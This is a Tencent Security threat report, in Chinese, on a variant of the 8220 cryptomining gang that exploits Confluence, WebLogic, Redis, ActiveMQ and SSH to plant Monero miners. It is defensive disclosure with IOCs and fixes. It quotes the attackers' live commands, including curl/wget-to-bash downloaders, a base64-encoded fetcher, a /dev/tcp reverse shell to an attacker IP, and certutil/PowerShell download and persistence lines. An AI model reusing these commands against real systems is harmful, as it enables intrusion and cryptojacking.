8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

  • A+
所属分类:安全新闻

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

长按二维码关注

腾讯安全威胁情报中心




一、威胁概述

腾讯安全威胁情报中心接到企业客户求助,称腾讯云防火墙有风险告警,请求安全专家协助排查。腾讯安全专家根据腾讯云防火墙捕捉到的攻击流量包分析,该客户正在遭遇8220团伙新变种的攻击,由于发现、处置及时,客户未受损失。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

8220团伙的此次攻击利用了Confluence远程代码执行漏洞(CVE-2019-3396)、Weblogic反序列化漏洞(CVE-2017-10271)、Weblogic反序列化漏洞(CVE-2019-2725)入侵,攻击得手后会继续通过SSH弱口令、Redis未授权访问漏洞、ActiveMQ未授权访问漏洞横向移动,以尽可能入侵控制更多主机,组建僵尸网络挖矿。

被入侵主机会连接黑客控制的服务器建立shell,接受黑客远程控制,随后安装门罗币挖矿木马。劫持Linux库文件加载过程劫持libs.so文件,Hook Readdir函数对木马进程进行隐藏,再通过安装定时任务、启动项进行持久化。

8220挖矿木马新变种同时攻击Windows平台,入侵后投递BAT、Powershell类型的恶意Payload,最终通过控制肉鸡系统组建僵尸网络来挖矿牟利。

对8220挖矿团伙的最新攻击活动,腾讯安全云原生安全产品(腾讯主机安全、腾讯云防火墙)均支持检测、防御,已部署腾讯云原生安全方案的企业客户不会受害。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

腾讯云主机安全提示用户修复Confluence远程代码执行漏洞(CVE-2019-3396)


通过技术分析,完善相关威胁情报,溯源本次攻击事件,发现受到变种攻击影响的云主机有数千台。腾讯安全专家建议企业用户部署腾讯云原生安全方案,并尽快修复以下安全漏洞:


CVE-2017-10271修复建议:

对访问wls-wsat的资源进行访问控制。临时解决方案:根据实际环境路径,删除WebLogic程序下列war包及目录,

rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.warrm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.warrm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat


CVE-2019-2725修复建议:

安装补丁包:

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html


CVE-2019-3396修复建议:

官方已修复该漏洞,可到官网下载无漏洞版本:https://www.atlassian.com/


Redis未授权访问漏洞修复建议:

1)配置redis.conf修改bind的值,设置其绑定的ip
2)配置redis.conf,找到requirepass,设置密码


CVE-2016-3088修复建议:
1)ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除,建议升级至 5.14.0 及其以后版本。
2)也可通过移除 confjetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能。

<bean class="org.eclipse.jetty.webapp.WebAppContext">    <property name="contextPath" value="/fileserver" />    <property name="resourceBase" value="${activemq.home}/webapps/fileserver" />    <property name="logUrlOnStart" value="true" />    <property name="parentLoaderPriority" value="true" /></bean>




二、威胁发现路径

腾讯云防火墙捕获到的Confluence远程代码执行漏洞(CVE-2019-3396)攻击流量:

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


腾讯云防火墙捕获到Weblogic反序列化漏洞(CVE-2017-10271)攻击流量:

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


腾讯云防火墙捕获到Weblogic反序列化漏洞(CVE-2019-2725)攻击流量:

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


若云主机存在上述可以被利用的高危漏洞,就会执行以下恶意命令:

Confluence漏洞攻击后执行的恶意命令:

 (curl -s hxxp://198.46.202.146:1234/xmsd||wget -q -O - hxxp://198.46.202.146:1234/xmsd)|bash -sh


Weblogic漏洞攻击后执行的恶意命令:

curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc=|base64 -d|bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/




三、对Linux系统的攻击

横向移动

1.从/.ssh/known_hosts中获取已认证的远程主机ID,与对应的主机建立SSH连接并执行命令下载恶意脚本xms。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


2.利用下载的攻击程序hxx进行SSH扫描和爆破登陆,然后下载xms执行。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


3.利用ActiveMQ未授权访问漏洞
ActiveMQ是Apache下的开源项目,是一种在分布式系统中应用程序借以传递消息的媒介。ActiveMQ默认监听在8161端口,由于未设置密码或使用默认密码可导致未授权访问,攻击者利用连接该端口并通过put请求写入文件’/fileserver/go.txt’,最终创建恶意的定时任务。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


4. 针对Redis服务的6379端口进行扫描,并利用未授权访问漏洞攻击,写入恶意的定时任务。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

持久化

1、 通过创建crontab定时任务持久化

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


2、通过写入启动项
/etc/cron.hourly/oanacroner1
/etc/init.d/down

防御逃逸

通过Linux动态链接库LD_PRELOAD劫持加载恶意.so文件libs.so,libs.so hook readdir 函数对指定进程进行隐藏。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

远程控制

被控制机器反弹shell连接到控制端198.46.202.146:8899
nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 &

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

挖矿

下载采用XMRig编译的挖矿木马hxxp://w.apacheorg.top:1234/.libs

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


矿池:w.apacheorg.xyz:80
钱包:
48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御





四、对Windows系统的攻击

入侵后执行1.bat

1.bat首先尝试获取管理员权限。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


卸载阿里云盾。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


下载挖矿木马hxxp://107.172.214.23:1234/svchostd.jpg到'%USERPROFILE%Documentsdebugsvchostd.exe'。

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('hxxp://107.172.214.23:1234/svchostd.jpg', '%USERPROFILE%Documentsdebugsvchostd.exe')"if errorlevel 1 (  echo ERROR: Can't download c3pool advanced version of xmrig  certutil -urlcache -split -f hxxp://107.172.214.23:1234/svchostd.jpg %USERPROFILE%Documentsdebugsvchostd.exe )


利用nssm将挖矿木马安装为服务启动。

"%USERPROFILE%Documentsdebugnssm.exe" install svchostd "%USERPROFILE%Documentsdebugsvchostd.exe"


添加计划任务和启动项进行持久化:

schtasks /create /tn SystemProcess /tr "cmd /c certutil -urlcache -split -f hxxp://w.apacheorg.top:1234/1.txt %USERPROFILE%Documents1.bat & %USERPROFILE%Documents1.bat" /sc daily>nul 2>nul


reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v "start" /d "cmd /c certutil -urlcache -split -f hxxp://w.apacheorg.top:1234/1.txt %USERPROFILE%Documents1.bat & %USERPROFILE%Documents1.bat" /f


入侵后执行xms.ps1

下载挖矿木马xmr64.exe,连接矿池xmr.givemexyz.in:8080,使用钱包
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ挖矿门罗币。
8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


通过PowershellTcp.ps1建立反弹shell,连接控制端198.46.202.146:8081。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御




威胁视角看攻击行为

ATT&CK阶段

行为

侦察

扫描IP端口,确认可攻击目标存开放7001等端口。

资源开发

注册C2服务器,制作shell脚本木马,挖矿木马,SSH爆破程序。

初始访问

利用对外开放的confluence、Weblogic服务漏洞攻击,植入恶意Payload执行恶意命令进而入侵系统。

执行

执行恶意命令下载挖矿木马,僵尸网络木马,爆破攻击程序。

防御逃逸

劫持Linux库文件加载libs.so,Hook Readdir函数隐藏木马进程。

持久化

安装定时任务、系统启动项。

命令与控制

反弹shell连接控制端。

横向移动

攻击者在失陷机器上运行端口扫描程序扫描内网SSH的22端口,ActiveMQ的8161端口、Redis的6379端口,并进行爆破和漏洞攻击在内网进行横向移动。

影响

门罗币矿机不间断的工作,会导致系统CPU负载过大,大量消耗主机CPU资源,严重影响主机正常服务运行,导致主机有系统崩溃风险。DDOS攻击会导致目标服务接收过量虚假请求无法正常运转。


该团伙相关的威胁数据已加入腾讯安全威胁情报,赋能给腾讯全系列安全产品,用户可以通过订阅腾讯安全威胁情报产品,让全网安全设备同步具备和腾讯安全一致的威胁检测、防御能力。

推荐政企用户在公有云中部署腾讯云防火墙、腾讯主机安全(云镜)检测防御相关威胁。

腾讯云防火墙已支持拦截利用Weblogic反序列化漏洞CVE-2017-10271、CVE-2019-2725发起的恶意攻击行为。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


腾讯主机安全支持SSH弱口令检测,Redis基线合规检测。按基线检测的结果纠正弱口令,可避免8220挖矿木马团伙利用弱口令攻击在内网横向扩散。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


私有云用户可通过腾讯高级威胁检测系统进行流量检测分析,及时发现8220挖矿团伙的攻击活动。如下图:腾讯高级威胁检测系统(御界)检测到利用Apache ActiveMQ文件上传远程代码执行(CVE-2016-3088)发起的恶意攻击行为。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


IOCs

IP
209.141.40.190
194.5.249.238
198.46.202.146
107.172.214.23

Domain
w.apacheorg.xyz
w.apacheorg.top
bash.givemexyz.in

URL
hxxp://209.141.40.190/d.py
hxxp://209.141.40.190/xms.ps1
hxxp://209.141.40.190/xmr64.exe
hxxp://194.5.249.238/x86_64
hxxp://194.5.249.238/i686
hxxp://194.5.249.238/go
hxxp://107.172.214.23:1234/svchosts.jpg
hxxp://209.141.40.190/hxx
hxxp://209.141.40.190/ps
hxxp://209.141.40.190/scan
hxxp://209.141.40.190/scan.sh
hxxp://w.apacheorg.xyz:1234/1.txt
hxxp://w.apacheorg.top:1234/xmss
hxxp://w.apacheorg.top:1234/.libs
hxxp://w.apacheorg.top:1234/libs.so
hxxp://w.apacheorg.top:1234/.lib
hxxp://198.46.202.146:1234/xmsd
hxxp://bash.givemexyz.in/scan.py

MD5
lib

e5c3720e14a5ea7f678e0a9835d28283


lib

745b2347513e58b9f0a45b497b3f7e60


libs

e5c3720e14a5ea7f678e0a9835d28283


1.bat

7db35a72744f488c1c8925c50364ee80


xms.ps1

d4ae1503593d3e7e9db1256b89fa3eb5


参考链接:

腾讯主机安全(云镜)捕获8220挖矿团伙最新变种使用新漏洞对企业云服务器的攻击
“8220”挖矿木马入侵服务器挖矿,组建“海啸”僵尸网络,可发起DDoS攻击
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)分析
https://paper.seebug.org/346/


8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御


关于腾讯安全威胁情报中心


腾讯安全威胁情报中心是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托顶尖安全专家团队支撑,帮助安全分析人员、安全运维人员快速、准确地对可疑威胁事件进行预警、处置和溯源分析。

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

长按二维码关注

腾讯安全威胁情报中心

8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

本文始发于微信公众号(腾讯安全威胁情报中心):8220挖矿木马变种利用多种漏洞入侵扩散,腾讯安全云原生方案全面检测防御

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: